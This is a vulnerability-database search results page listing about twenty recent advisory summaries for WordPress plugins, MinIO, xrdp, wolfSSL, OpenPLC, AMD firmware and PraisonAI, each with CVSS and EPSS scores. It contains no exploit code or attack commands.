Lucene search
K

265 matches found

Cvelist
Cvelist
added 2026/04/22 7:45 a.m.44 views

CVE-2026-4119 Create DB Tables <= 1.2.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Database Table Creation/Deletion via admin-post.php

The Create DB Tables plugin for WordPress is vulnerable to authorization bypass in all versions up to and including 1.2.1. The plugin registers adminpost action hooks for creating tables adminpostaddtable and deleting tables adminpostdeletedbtable without implementing any capability checks via...

9.1CVSS0.00729EPSS
Exploits0References13
ATTACKERKB
ATTACKERKB
added 2026/04/22 7:45 a.m.2 views

CVE-2026-4090

The Inquiry Cart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.2. This is due to missing nonce verification in the rdicsettingspage function when processing settings form submissions. This makes it possible for unauthenticated attackers...

6.1CVSS5.7AI score0.00243EPSS
Exploits0References18
Vulnrichment
Vulnrichment
added 2026/04/22 7:45 a.m.3 views

CVE-2026-4280 Breaking News WP <= 1.3 - Missing Authorization to Authenticated (Subscriber+) Local File Inclusion/Read

The Breaking News WP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3. This is due to the brnwpajaxform AJAX endpoint lacking both authorization checks and CSRF verification, combined with insufficient path validation when the brnwptheme option...

6.5CVSS5.8AI score0.00814EPSS
Exploits0References7
CVE
CVE
added 2026/04/22 12:49 a.m.31 views

CVE-2026-40344

MinIO is affected by an authentication bypass in the Snowball auto-extract handler (PutObjectExtractHandler) prior to RELEASE.2026-04-11T03:20:12Z. An attacker with a valid access key (including the default minioadmin or any key with WRITE on a bucket) can write arbitrary objects to any bucket wi...

8.8CVSS6.1AI score0.00418EPSS
Exploits0References3Affected Software1
NVD
NVD
added 2026/04/17 8:16 p.m.6 views

CVE-2026-40434

Anviz CrossChex Standard lacks source verification in the client/server channel, enabling TCP packet injection by an attacker on the same network to alter or disrupt application traffic...

8.1CVSS0.00231EPSS
Exploits0References3
Debian CVE
Debian CVE
added 2026/04/17 7:27 p.m.5 views

CVE-2026-32105

xrdp is an open source RDP server. In versions through 0.10.5, xrdp does not implement verification for the Message Authentication Code MAC signature of encrypted RDP packets when using the "Classic RDP Security" layer. While the sender correctly generates signatures, the receiving logic lacks th...

9.3CVSS5.3AI score0.00174EPSS
Exploits0
EUVD
EUVD
added 2026/04/16 9:31 p.m.5 views

EUVD-2025-209510

A missing lock verification in AMD Secure Processor ASP firmware may permit a locally authenticated attacker with administrative privileges to alter MMIO routing on some Zen 5-based products, potentially compromising guest system integrity...

5.9CVSS5.8AI score0.00108EPSS
Exploits1References2
Github Security Blog
Github Security Blog
added 2026/04/16 8:43 p.m.7 views

Weblate: Arbitrary File Read via Symlink

Impact The ZIP download feature didn't verify downloaded file and it could follow symlinks outside the repository. Patches https://github.com/WeblateOrg/weblate/pull/18683 References Thanks to @DavidCarliez for reporting this vulnerability via GitHub...

7.7CVSS5.8AI score0.00465EPSS
Exploits0References4Affected Software1
RedhatCVE
RedhatCVE
added 2026/04/16 7:22 p.m.5 views

CVE-2026-3642

The e-shot™ form builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.2. The eshotformbuilderupdatefielddata AJAX handler lacks any capability checks currentusercan or nonce verification checkajaxreferer/wpverifynonce. The function is...

5.3CVSS5.7AI score0.00367EPSS
Exploits0References1
CNNVD
CNNVD
added 2026/04/16 12:0 a.m.15 views

AMD EPYC 安全漏洞

AMD EPYC is a high-performance server processor developed by American semiconductor company AMD. AMD EPYC has a security vulnerability that stems from the lack of lock verification. This vulnerability could allow for modifications to MMIO routes and undermine the integrity of customer systems...

5.9CVSS5.8AI score0.00108EPSS
Exploits1References1
ATTACKERKB
ATTACKERKB
added 2026/04/15 8:28 a.m.3 views

CVE-2026-3642

The e-shot™ form builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.2. The eshotformbuilderupdatefielddata AJAX handler lacks any capability checks currentusercan or nonce verification checkajaxreferer/wpverifynonce. The function is...

5.3CVSS5.7AI score0.00367EPSS
Exploits0References6
CNNVD
CNNVD
added 2026/04/15 12:0 a.m.10 views

WordPress plugin Product Pricing Table by WooBeWoo 安全漏洞

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application extension. The...

6.1CVSS5.9AI score0.00126EPSS
Exploits0References1
CNNVD
CNNVD
added 2026/04/15 12:0 a.m.10 views

WordPress plugin e-shot form builder 安全漏洞

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application extension. WordPres...

5.3CVSS5.8AI score0.00367EPSS
Exploits0References2
RedhatCVE
RedhatCVE
added 2026/04/13 7:24 p.m.2 views

CVE-2026-4401

The Download Monitor plugin for WordPress is vulnerable to Cross-Site Request Forgery in the actionshandler and bulkactionshandler methods in class-dlm-downloads-path.php in all versions up to, and including, 5.1.10. This is due to missing nonce verification on these functions. This makes it...

5.4CVSS5.6AI score0.00161EPSS
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/04/10 7:22 p.m.4 views

CVE-2026-35063

OpenPLCV3 REST API endpoint checks for JWT presence but never verifies the caller's role. Any authenticated user with role=user can delete any other user, including administrators, by specifying their user ID or they can create new accounts with role=admin, escalating to full administrator access...

8.8CVSS5.8AI score0.0024EPSS
Exploits0References1
EUVD
EUVD
added 2026/04/10 6:31 a.m.6 views

EUVD-2026-21292

In wolfSSL's EVP layer, the ChaCha20-Poly1305 AEAD decryption path in wolfSSLEVPCipherFinal and related EVP cipher finalization functions fails to verify the authentication tag before returning plaintext to the caller. When an application uses the EVP API to perform ChaCha20-Poly1305 decryption,...

7.6CVSS5.9AI score0.00152EPSS
Exploits0References2
CVE
CVE
added 2026/04/10 2:38 a.m.34 views

CVE-2026-5479

In wolfSSL, the ChaCha20-Poly1305 AEAD decryption path in the EVP layer (wolfSSL_EVP_CipherFinal and related finalization functions) fails to verify the authentication tag before returning plaintext. As a result, when using the EVP API to decrypt ChaCha20-Poly1305, the tag may be computed or acce...

8.1CVSS5.9AI score0.00152EPSS
Exploits0References1Affected Software1
Vulnrichment
Vulnrichment
added 2026/04/10 1:24 a.m.1 views

CVE-2026-1924 Aruba HiSpeed Cache <= 3.0.4 - Cross-Site Request Forgery to Plugin Settings Reset

The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.0.4. This is due to missing nonce verification on the ahscajaxresetoptions function. This makes it possible for unauthenticated attackers to reset all plugin settings t...

4.3CVSS5.6AI score0.00181EPSS
Exploits0References4
CNNVD
CNNVD
added 2026/04/10 12:0 a.m.9 views

PraisonAI 代码问题漏洞

PraisonAI is a low-code multi-agent collaboration framework developed by Mervin Praison. Versions of PraisonAI prior to 1.5.128 contained code vulnerabilities. These vulnerabilities stemmed from the webcrawl’s httpx backtracking path, which directly passed the user-provided URL to...

7.1CVSS5.9AI score0.00281EPSS
Exploits1References1
Vulnrichment
Vulnrichment
added 2026/04/09 9:42 p.m.2 views

CVE-2026-40154 PraisonAI Affected by Untrusted Remote Template Code Execution

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through malicious templates. This vulnerability is fixed in...

9.3CVSS5.8AI score0.00304EPSS
Exploits1References1
Rows per page
Query Builder